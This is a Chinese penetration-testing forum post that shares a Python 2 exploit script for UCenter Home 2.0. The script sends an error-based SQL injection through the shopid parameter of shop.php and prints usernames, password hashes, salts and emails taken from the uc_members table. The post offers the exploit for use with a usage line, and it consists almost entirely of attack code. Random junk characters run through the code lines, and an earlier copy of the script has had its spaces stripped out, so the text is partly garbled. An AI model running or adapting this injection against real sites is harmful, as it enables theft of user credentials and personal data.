找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2045|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl$ f6 q- z0 ?+ f) v

9 t2 s- c% \6 N
0 B# r! m6 l7 t& e" A7 ~7 D3 k  r# K3 m#!/usr/bin/env python  . i+ C% H+ d: x* p9 T! L  w# D. i
8 E0 n# a/ G! t- e; s$ v) C
import sys  
7 q$ b# R; s+ S8 o- Pimport urllib2  6 ~2 D  Y6 h8 g' {# S- B
import re  
0 q: }! t( n$ e2 H! X" f; Y * s7 I! N/ x& m- y9 E+ h5 j
def info():  
5 H+ b3 v+ N4 Q" s( l    print 'From:http://www.exploit-db.com/exploits/14997/' 7 W5 z/ [: ?) D6 [. O
    print 'http://www.hake.cc/Web_loudong/'
/ d! |3 w: Y) V& Z( I& c    print 'changed:qiaoy'  
# N$ m+ }" c# g$ z. L8 E    print 'exp:'  , \6 o9 e: F% Q6 B9 r1 |2 F
    print ' ./UCenter_Home_2.0.py site'  
3 e2 L% V* B  E- N
/ h) T3 H/ s- _  m# w& F  A" Tdef main():  
( ?& G" W7 C! E    if len(sys.argv) != 2:  
) \" n0 P6 b; J" n+ Q9 h; n0 L6 u( X        info()  : n# @6 y: v, d4 g- q$ t' J  ~
    else:  
4 J3 y6 A9 r' g. N        site = sys.argv[1]  
3 M7 N& w+ J# Q' J! ^  h        if site[0:7] == 'http://':  
% j) n5 _7 v0 V! {; D/ T            sitesite =site  
4 g& i$ O* h! S0 J& b5 O        elif site[0:8] == 'https://':  + P! L, t+ f9 H6 a1 U
            sitesite = site  
& W" U( m! D0 O. @/ e        else:  
! O2 i3 x3 ?6 `9 x& p            site = 'http://'+site  
# R- u4 s! Y$ {2 @/ V$ O* W        try:  
  S6 f# X" r0 ?/ d, J& W# d5 t            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  ; `; a( z5 l) a* I2 T# L. C* Q
            Value = urllib2.urlopen(url).read()  
, z6 j$ d. @: h# A4 f( g            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  ( L$ `+ B3 z) d- T
            hacked = Msg.split(':')  
8 Y/ ?, g) ?% P4 g: \' f            print 'Name:    '+hacked[1]  
8 H" i) V1 ?6 @! Z! a3 z            print 'Passwd:  '+hacked[2]  
# d6 V* Q" O# z2 x. h7 [) V: g            print 'salt:    '+hacked[3]  8 p- l  x! ~! q. m' G3 K& q' c
            print 'email:   '+hacked[4]  3 o4 J' W% M: Z
        except:  
! y$ _: |- _3 h            print 'Sorry,I can\'t work............'  7 Q( r! J2 M2 \: X2 C4 b
* O2 U8 }/ Y7 b' {0 k
if __name__ == '__main__':  
# q2 d  ]7 I8 y  R. n3 W    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表